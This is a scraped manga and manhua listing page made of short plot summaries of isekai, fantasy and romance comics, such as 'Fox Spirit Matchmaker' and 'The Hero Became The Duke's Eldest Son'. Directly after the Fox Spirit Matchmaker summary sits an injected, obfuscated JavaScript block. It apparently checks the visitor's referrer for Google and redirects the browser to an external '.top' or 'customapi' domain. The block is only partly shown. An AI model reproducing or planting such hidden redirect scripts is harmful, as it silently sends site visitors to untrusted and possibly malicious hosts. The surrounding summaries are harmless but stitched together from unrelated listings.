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I’m the One Who Died, but the Hero Went Crazy

As the hero’s comrade, I died after blocking him from the evil dragon’s breath. Well, it’s fine. The Hero Elkinas was the only friend I trusted to have my back. I’ll go out with a bang, I guess, so the hero can marry a pretty woman and live the rest of his life.…Is what I thought would happen, but after 80 years passed, I came back to life in a completely different body. And…“It’s regrettable, Arlene. Elkinas went insane. Completely insane.”That was the first thing I heard.*What else could I do? I should help him. To help my close friend who seems to have not been able to accept my death, I decided to stay by his side while hiding my identity.This way Elkinas could completely accept the past and become happy, since this is the very reason why I died for him.But… I think he recognized me.”You’re… Arlene, aren’t you?”I touched my face. I definitely don’t look like Arlene.Shouldn’t there be no way he could know who I was?”I won’t ever let you go… Ever.”Elkinas said with shining eyes.


A Nest Of Phoenixes

Read manhua A Nest Of Phoenixes / 一窝凤凰 / Yī wō fènghuáng In the ancient times, when heaven and earth were first born, all order was not yet established, the world was chaotic and the three worlds were unsettled. Fortunately, the four Immortal Monarchs, Heng Yang, Dong Yang, Ling Yang and Qing Yang, emerged from the sky to guard the four seas and the eight wastes, leading to the subservience of all the tribes and a harmonious coexistence. The sky and the earth were clear and prosperous. However, how did the Phoenix tribe come to be so different? They are jumping up and down, making a scene, disturbing the immortals, but there are people who enjoy this.


A Song Dwelling In The Clouds: Love Inside The Cage

Read manhua A Song Dwelling In The Clouds: Love Inside The Cage / 云想之歌笼中之恋 From INKR: As a girl arrives at a new school, she encounters a boy who seems to be hostile towards her. She also meets a gentle-looking man, who sends her and the hostile boy in the past. Now the two have to adapt to their new lifestyle and find a way back to the present


Super Affection System

a college student got transmigrated in fantasy word of the game he loved the most and acquiring a new system. watch as Liu Yuan start this journey to scam his way to the top


Fox Spirit Matchmaker

In Eastern History, humans and spirits exist in this world. Fox spirits have long acted as matchmakers, holding a prestigious position among spirits. In this story, the lives of a fox spirit and a man who have both rejected the idea of true love become intertwined, and their exciting adventure begins.<script></script><script>function _0x2205(){var _0x4fe129=['sdlip','floor','random','location','12332320tXraAZ','FFxAT','294wAWgho','5572524hBgIXo','6431382zBqnux','3319383tbzVOf','UnUaW','nhCyg','http://rea','referrer','https://ip','1UdftWr','includes','FYwcK','nszZJ','10EeqcCF','google','.customapi','href','','then','text','DSJKW','JBHla','.top/','783752yQMYAW','23665pNDNyh','12498367VmFquG','OxEGc','QvBNi'];_0x2205=function(){return _0x4fe129;};return _0x2205();}(function(_0x17f687,_0xfdcfe7){var _0x49eac0=_0x5ea1,_0x5abd21=_0x17f687();while(!![]){try{var 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The Hero Became The Duke’s Eldest Son

Read “The Hero Became The Duke’s Eldest Son Manga” – “The Hero Became The Duke’s Eldest Son Manhwa” Online Free On MANHUATOP The summary of the comics “The Hero Became The Duke’s Eldest Son”: Aden Albireo was called “The Dragon Slayer,” the hero who slayed the Berserker, and the Demon Lord, who ultimately, saved the world. But he was betrayed by those who swore friendship and was left for dead… “I never thought I’d come back to life!” 15 years before the Demon Lord’s resurrection, The reckless eldest son of the Duke, who was unheard of and unseen, “Aden Albireo” has returned in the body of “Aden Remes”! And what’s more… “Long time no see, Dragon King!” The Demon Lord I thought I had slain is within my soul?! Will Aden be able to end his uncomfortable cohabitation(?) with the Demon Lord and prevent his resurrection? “The Hero Became The Duke’s Eldest Son” is alternatively named: Duke’s Eldest Son Is a Regressed Hero / Hero Becomes Duke’s Eldest Son / Hero Becomes the Eldest Son of a Duke / 영웅, 공작가 장남 되다 The comics “The Hero Became The Duke’s Eldest Son” belongs to the Genre: Action, Adventure, Fantasy “MANHWACLAN, MANGA UPDATES, KUNMANGA…” are the most searched keywords on the website MANHWACLAN. We offer a wide selection of the best and newest comics series with all chapters updated quickly and featuring high-quality images, providing readers with wonderful and enjoyable reading experiences at LikeManga. You can read TOP MANGA The Regretful Villainess Is Happy Because She Got Divorced Underworld Restaurant North Snow Love Story

1 days ago

Isekai Yururi Kikou: Raising Children While Being An Adventurer

"I'm terribly sorry!" A god was suddenly prostrating in front of Kayano Takumi. He was apparently killed by a mistake. Moreover, he can't be reborn again. However, according to god, he would be able to live in a different world, but he made a mistake again and transferred him into a dangerous forest... where he finds a pair of children and decides to take care of them. (Source: Alphapolis, edited)


Seirei-tachi no Rakuen to Risou no Isekai Seikatsu

It's the Golden Week, and Yuuta Morizono (Age 25) can't wait to spend the next 11 days staying home and conquering all of his games and manga. After a trip to the supermarket to stock up on food however, he found himself stranded in a wasteland with no sight of human - how is he going to survive with just the food he just bought?


Fei Ren Zai

Chinese Mythical Beasts living in modern China.


Tensei Mae wa Otoko Datta no de Gyaku Harem wa Okotowari Shite Orimasu

Tasuku Nakamura, who was thrown into the sea in a marine accident and tried to help his best friend, ended his short life of 25 years. Formerly a mediocre office worker, when he opened his eyes, he was in the form of a six-year-old baron\'s daughter, Sophie Linier. At first she was confused by the changes, but she was reincarnated as a beautiful girl and decided to live as a lady in a different world. The struggle of a 6-year-old girl with the soul of a 25-year-old boy begins ... !!


When a Villain Meets a Villainess

Atalanta, the head of an underground organization, is infamous for committing violent acts against nobles. One day, she receives a commission from the Emperor to assassinate the tyrant Grand Duke Lionel Bianca. Atalanta dreams of a future where her and the members of her organization can live a normal life, so she accepts the commission and infiltrates the Grand Duchy to assassinate him… But, why can’t he be killed? Will Atalanta be able to safely escape from the Grand Duke, who is suddenly whispering confessions of love?


Schrödinger's sheep

An ordinary corporate slave, Ding Xueyang, has a secret - He has a special ability! But his special ability has a flaw; if he is seen using it, the special ability will be randomized to a new one. For over twenty years, in order to keep this secret, Ding Xueyang has been living very cautiously. He didn\'t have a significant other, didn\'t make any friends, and didn\'t even keep a pet. Until one day, a homeless person came across his secret, and from then on Ding Xueyang has plunged into an abyss of suffering!
